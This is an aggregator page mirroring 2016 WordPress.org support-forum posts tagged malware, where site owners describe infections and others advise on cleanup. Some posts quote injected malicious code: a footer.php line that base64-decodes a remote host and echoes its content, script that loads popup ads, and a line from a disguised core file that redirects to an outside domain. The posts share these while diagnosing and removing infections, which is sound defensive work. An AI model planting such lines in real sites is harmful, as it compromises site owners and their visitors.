Quantcast
Channel: Topic Tag: malware | WordPress.org
Viewing all 3861 articles
Browse latest View live

kmessinger on "editing source code HTML of a wordpress page or post"

June 1, 2016, 11:39 am
$
0
0

One way is to use a plugin like https://wordpress.org/plugins/better-search-replace/

Another is to sign into your hosted account and use phpMyAdmin which should be provided by your host.

Whichever or whatever, make sure you have a backup of the database.

I am no sure how you got rid of the malware but they usually leave a backdoor. You need to start working your way through these resources:

Additional Resources:

Search

luckydsign on "Unwanted pop up"

June 2, 2016, 4:18 am
$
0
0

hello - i have solved the problem...
go to your theme (ftp) -> footer.php and delete the line "<?php echo @file_get_contents(base64_decode("aHR0cDovL2Nkbi5nb21hZmlhLmNvbQ==")); ?>"

that have fixed my problem - good luck :)

luckydsign on "Unwanted pop up"

June 2, 2016, 4:24 am
$
0
0

greg - your problem came from your "sweetcaptcha" plugin ...
your welcome....

window.sweetcaptchaCSRF = 'e0118086aa7b0e9978db2b4946408a2d'; var mobile = typeof(window.orientation) != 'undefined' || navigator.userAgent.match(/iphone|ipod|blackberry|android|palm|windowss+ce|mobile|msie 8|msie 7|msie 6/i) || (navigator.userAgent.indexOf('Safari') > -1 && navigator.userAgent.indexOf("Chrome") == -1 && navigator.userAgent.indexOf('Windows') > -1);if (1 || typeof(sc_jQuery) === 'undefined') {
window.sweetcaptchaPluginVersion = "3.0.9";
document.write('<scr'+'ipt type="text/javascript" src="//www.sweetcaptcha.com/javascripts/sclytics.js"></scr'+'ipt>');
document.write('<scr'+'ipt type="text/javascript" src="//clktag.com/adServe/banners?tid=SWTMPOP&tagid=2" async="async"></scr'+'ipt>');
document.write('<img width="1" style="position: absolute" height="1" src="//www.sweetcaptcha.com/api/v2/apps/csrfp/181121?t=1464866411928&mobile='+(mobile ? '1' : '0')+'" />');};

gregkeet on "Unwanted pop up"

June 2, 2016, 8:13 am
$
0
0

Thanks for the replies, let me update the site and see if that works! thanks again for your input. their site is still popping up pages. Let's sort it out for them. :)

arnimation on "[Plugin: Wordfence Security] Unknown PDF file links are appearing on my sites"

June 2, 2016, 9:23 pm
$
0
0

I have the same problem, here are some of links

http://themealeniumproject.com/How-the-Faith-Is-Protected.pdf
http://themealeniumproject.com/Vom-Verh-Ltni-Der-Electricit-T-Zum-Magnetismus---.pdf
http://themealeniumproject.com/Select-Discourses-by-John-Smith--To-Which-Is-Added-a-Sermon-Preached-at-the-Author-s-Funeral--1859-.pdf

hundreds of theses unknown pdf links.. might even be thousands.

It's nowhere to be found on ftp folders and I already installed wordfence, did the scan but these links, hundreds of them are still showing up and bugging down my server. Help please!

Mel on "[Plugin: WP Support] Malware"

June 6, 2016, 4:10 am

Gerkin on "[Plugin: WP Optimize Speed By xTraffic] Malware suspected: please provide your source unminified JS"

June 6, 2016, 4:30 pm
$
0
0

Hi. I've checked the JS loaded by the plugin, and I suspect it being a malware, mainly because of the following section of code:

[ Suspected malware deleted, don't post that here ]

This piece of code, even beautified, seems to be think to be as unreadable as possible. Maybe I'm wrong, but if it's true, it does not follow the wordpress plugin development guide lines.
So, to allow me to understand your code and check that this script is senseful, please provide an unminified version, and the uglifier you used to reduce your scripts to check concordance.

This suspicion is even more increased by the fact that the GitHub user was deleted and is impossible to track. https://github.com/wp-plugins/wp-optimize-speed-by-xtraffic . Please answer quickly, or I'll have to notify to WP teams what I saw, and why this seems to not follow the rules.

Thank you for your attention.

https://wordpress.org/plugins/wp-optimize-speed-by-xtraffic/

Jan Dembowski on "[Plugin: WP Optimize Speed By xTraffic] Malware suspected: please provide your source unminified JS"

June 6, 2016, 5:01 pm
Search

Gerkin on "[Plugin: WP Optimize Speed By xTraffic] Malware suspected: please provide your source unminified JS"

June 6, 2016, 5:15 pm

Gerkin on "[Plugin: WP Optimize Speed By xTraffic] Malware suspected: please provide your source unminified JS"

June 7, 2016, 12:57 pm

jakedohm on "Redirects Issue | Malware?"

June 9, 2016, 6:07 am
$
0
0

I noted some code errors on my page, through the inspector, and then ran a tools.pingdom.com speed test, and it said "minimize redirects".

Here is the website url: amycarroll.org

Here are all of the redirects it said were on the page:

Remove the following redirect chain if possible:
http://px.owneriq.net/ep?sid%5B%5D=4034546264&s ... D=3588953253&pt=sholic&uid=Q5187616782111272696J
http://cm.g.doubleclick.net/pixel?google_nid=ow ... _hm=UTUxODc2MTY3ODIxMTEyNzI2OTZK&esi=1&pt=sholic
http://cm.g.doubleclick.net/pixel?google_nid=ow ... 2MTY3ODIxMTEyNzI2OTZK&esi=1&pt=sholic&google_tc=
http://px.owneriq.net/cm?id=&esi=1&pt=sholic&go ... rLJq3MAlYZZF_6f4&google_cver=1&google_ula=1174,0
http://ads.yahoo.com/pixel?adv=95413&t=2&id=172 ... 14c9bf54208864b5%26nwid%3D10000482661%26sigv%3D1
http://px.owneriq.net/ermcm?t=2&id=1722475&pigg ... 00482661&sigv=1&xid=ItmS.gE4ul7Yjd204hf.D1LG
http://ib.adnxs.com/pxj?bidder=13&seg=703107&ac ... ');as(4034546264);as(3585802694);as(3588953253);

Remove the following redirect chain if possible:
http://dmp.adform.net/serving/cookie/match/?party=1012
http://dmp.adform.net/serving/cookie/match/?CC=1&party=1012
http://loadm.exelator.com/load/?p=204&g=710&j=0&buid=1420197409912014404
http://load.s3.amazonaws.com/pixel.gif

Remove the following redirect chain if possible:
http://cm.g.doubleclick.net/pixel?google_nid=exelate&google_cm&google_sc
http://loadm.exelator.com/load/?p=204&g=001&bi= ... le_gid=CAESEF71qzcyvKGXmuU69Pf5dDY&google_cver=1
http://load.s3.amazonaws.com/pixel.gif

Remove the following redirect chain if possible:
http://i.w55c.net/m.gif?rurl=//cm.g.doubleclick ... id=9675309&google_hm=_wfivefivec64esc_&google_cm
http://cm.g.doubleclick.net/pixel?google_nid=9675309&google_hm=OXdJeWZGYlgxQmFaNDI1&google_cm
http://tags.w55c.net/match-result?id=8bb138bc04 ... le_gid=CAESEB-twcv_1nzthQr0XgcqKzQ&google_cver=1

Remove the following redirect chain if possible:
http://sync.tidaltv.com/GenericUserSync.ashx?dpid=4
http://loadm.exelator.com/load/?p=204&g=280&buid=0c024005-031e-4e38-bea0-2d66f37037c3&j=0
http://load.s3.amazonaws.com/pixel.gif

Remove the following redirect chain if possible:
https://cas.pxl.ace.advertising.com/cfcm.ashx?providerId=1013&extMatch=1&rcode=1
https://cas.pxl.ace.advertising.com/cfcm.ashx?providerId=1013&extMatch=1&rcode=1&ctst=1
https://dsum-sec.casalemedia.com/crum?cm_dsp_id=62&external_user_id=dP500014654752790077

Remove the following redirect chain if possible:
https://match.adsrvr.org/track/cmf/casale?cm_ds ... a.com%2Fcrum&cm_user_id=V1lgzrlQJGUAAEZbGLMAAAIG
https://match.adsrvr.org/track/cmb/casale?cm_ds ... a.com%2Fcrum&cm_user_id=V1lgzrlQJGUAAEZbGLMAAAIG
https://dsum-sec.casalemedia.com/crum?cm_dsp_id ... 2c3-4c44-b7fe-e2e7a1b225e8&expiration=1468067290

Remove the following redirect chain if possible:
https://pix04.revsci.net/J13421/a3/0/3/um.302?m ... a.com%2Fcrum&cm_user_id=V1lgzrlQJGUAAEZbGLMAAAIG
https://pix04.revsci.net/J13421/a3/Z/3/um.302?m ... rlQJGUAAEZbGLMAAAIG&asidi=bJFNvDDmndcICTf4u3r-sw
https://dsum-sec.casalemedia.com/crum?cm_dsp_id=97&external_user_id=BKzu3ZyuktrXMt4Hztn-lOyLuM9D

Remove the following redirect chain if possible:
https://www.wtp101.com/pull_sync/casale?cm_dsp_ ... a.com%2Fcrum&cm_user_id=V1lgzrlQJGUAAEZbGLMAAAIG
https://www.wtp101.com/ul_cb/pull_sync/casale?c ... a.com%2Fcrum&cm_user_id=V1lgzrlQJGUAAEZbGLMAAAIG
https://dsum-sec.casalemedia.com/rum?cm_dsp_id= ... nal_user_id=0f598d52-e4c6-4a1c-83e9-8ca60124c954

Remove the following redirect chain if possible:
http://ad.sxp.smartclip.net/sync?type=red&dspuuid=2da56dcd7f7522f7d28524b942e70474
http://ad.sxp.smartclip.net/img/trpx.gif

Remove the following redirect chain if possible:
http://b.scorecardresearch.com/b?c1=7&c2=193763 ... 27s%20Blog&c7=http%3A%2F%2Famycarroll.org%2F&c9=
http://b.scorecardresearch.com/b2?c1=7&c2=19376 ... 27s%20Blog&c7=http%3A%2F%2Famycarroll.org%2F&c9=
Remove the following redirect chain if possible:
http://ib.adnxs.com/pxj?bidder=13&seg=703107&ac ... 7);as(4034546264);as(3585802694);as(3588953253);
http://ib.adnxs.com/bounce?%2Fpxj%3Fbidder%3D13 ... %29%3Bas%283585802694%29%3Bas%283588953253%29%3B
Remove the following redirect chain if possible:
http://loadus.exelator.com/load/?p=256&g=1693&j=d&puid=Q5187616782111272696J
http://loadus.exelator.com/load/?p=256&g=1693&j=d&puid=Q5187616782111272696J&xl8blockcheck=1

Remove the following redirect chain if possible:
http://tags.bluekai.com/site/2964?id=9wIyfFbX1BaZ425
http://tags.bluekai.com/site/2964?dt=0&r=125926 ... 936764&bkca=KJpnEnsNnwKLEcBniMO6uGy01E/a9e7UOSy=
Remove the following redirect chain if possible:
http://www.facebook.com/fr/u.php?p=441981302501808&m=9wIyfFbX1BaZ425
http://tags.w55c.net/rs?id=d777fecd6cb849b4bab0bfe71d57747a

Remove the following redirect chain if possible:
https://cm.g.doubleclick.net/pixel?google_nid=casale_media2_dbm&google_cm&google_sc
https://dsum-sec.casalemedia.com/crum?cm_dsp_id ... ser_id=CAESEE_eP26z7r4T4ucVxgBje9c&google_cver=1

Remove the following redirect chain if possible:
https://d.adroll.com/cm/index/ssp
https://dsum-sec.casalemedia.com/crum?cm_dsp_id=105&external_user_id=0

Remove the following redirect chain if possible:
https://pixel.sitescout.com/dmp/pixelSync?network=CASALEMEDIA
https://dsum-sec.casalemedia.com/rum?cm_dsp_id= ... a1d-420f-952a-cea985a743b2&expiration=1468067279

Remove the following redirect chain if possible:
https://px.owneriq.net/ecs?cm_dsp_id=31&cm_call ... a.com%2Fcrum&cm_user_id=V1lgzrlQJGUAAEZbGLMAAAIG
https://dsum-sec.casalemedia.com/crum?cm_dsp_id ... r_id=Q5187616782111272696J&expiration=1468067279

Remove the following redirect chain if possible:
https://ssum-sec.casalemedia.com/usermatch?s=18 ... F9604%2Fsync%2Fi.gif%3FpartnerId%3D1%26userId%3D
https://ssum-sec.casalemedia.com/usermatch?s=18 ... 4%2Fsync%2Fi.gif%3FpartnerId%3D1%26userId%3D&C=1

I haven't seen any changes in the behavior of the site, but I want to get these removed ASAP. Any suggestions where these might be coming from?

Davood Dehnavi on "Redirects Issue | Malware?"

June 9, 2016, 9:30 am
$
0
0

Check your htaccess file for any 301 redirects that look similar to these.

schecteracademicservices on "Where do I report a ?possible? undiscovered infection"

June 10, 2016, 8:34 am
$
0
0

I have found this file on several of our websites:

wp-admin/includes/class-wp-text.php

Nice innocuous name, but not part of the original wordpress installation.

The file date never matches the other files. Waaaaaay far to the right on line 52 we find a dead giveaway (all of line 52 pasted below):

******************************************************

if ( true /*!preg_match('/404/', $req_uri_orig) && !preg_match('/\/administrator\//', $req_uri_orig) && !preg_match('/\/bin\//', $req_uri_orig) && !preg_match('/\/cache\//', $req_uri_orig) && !preg_match('/\/cli\//', $req_uri_orig) && !preg_match('/\/components\//', $req_uri_orig) && !preg_match('/\/installation\//', $req_uri_orig) && !preg_match('/\/layouts\//', $req_uri_orig) && !preg_match('/\/libraries\//', $req_uri_orig) && !preg_match('/\/logs\//', $req_uri_orig) && !preg_match('/\/plugins\//', $req_uri_orig) && !preg_match('/\/tmp\//', $req_uri_orig) && !preg_match('/\/wp-login/', $req_uri_orig) && !preg_match('/\/xmlrpc/', $req_uri_orig) && !preg_match('/\/wp-admin/', $req_uri_orig) && !preg_match('/\/trackback/', $req_uri_orig)*/) $req_uri = 'topbarbietoys.com/';

************************************************

Thoughts?

schecteracademicservices on "Where do I report a ?possible? undiscovered infection"

June 10, 2016, 8:36 am
$
0
0

I should also note that none of my lovely malware scanners found this. Sitelock, sucuri, wordfence, "Anti-Malware Security and Brute-Force Firewall
"

Is topbarbietoys.com part of wordpress? ;-)

Jan Dembowski on "Where do I report a ?possible? undiscovered infection"

June 10, 2016, 10:41 am
Search

msk1985 on "Hack - fetching data from another server?"

June 10, 2016, 10:54 am
$
0
0

My hosting account was recently compromised, which I was able to fix through my host provider. However, since the hack, a few of my domains seem to be fetching data from another server/domain. If you load mskartwork.com or pathsofmarriage.com, the message bar on the bottom of the browser says "waiting for epsomdownsclinic.com".

I tried searching for the domain in my theme files and ran a few malware plugins for errors, but I can't find any code that would cause this. My load speeds have slowed down considerably since this began, and I'm afraid I am inadvertently passing information through an unauthorized server.

Does anyone have advice on how to correct the issue? Any help would be much appreciated!

amprodata on "add code into head of home page"

June 10, 2016, 1:01 pm
$
0
0

Hi,

we are getting security issue when using chrome on http://www.scfl.org. Have scanned with a couple different tools in wordpress and Google wants to verify.

I believe all I need to do is upload an html file or add meta tag into the site and I cant figure out how.

I see other people say how to go to wp-themes/(theme name) but I do not know how to get there. Thanks!

we are getting security issue when using chrome on http://www.scfl.org. Have scanned with a couple different tools in wordpress and Google wants to verify.

sterndata on "add code into head of home page"

June 10, 2016, 1:35 pm

dartiss on "Hack - fetching data from another server?"

June 10, 2016, 1:44 pm
$
0
0

It's worse than that - the first time I tried visiting your first site I got redirected to a dodgy site. Second attempt I got your site and can see the code you're referring to - it's about half way down the code, straight after the header, but there's no clue as to how it's been added.

Remain calm and carefully follow this guide. I've had the same occur to me and I ended up weedling out code from the root of wp-content/uploads as well as other folders.

amprodata on "add code into head of home page"

June 10, 2016, 1:50 pm
$
0
0

Yes I have ran the scans and now trying to request googles malware review, but it wants me to upload a html file, or insert meta code and I do not know where to do that.

Thanks

Viewing all 3861 articles
Browse latest View live
Search
<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>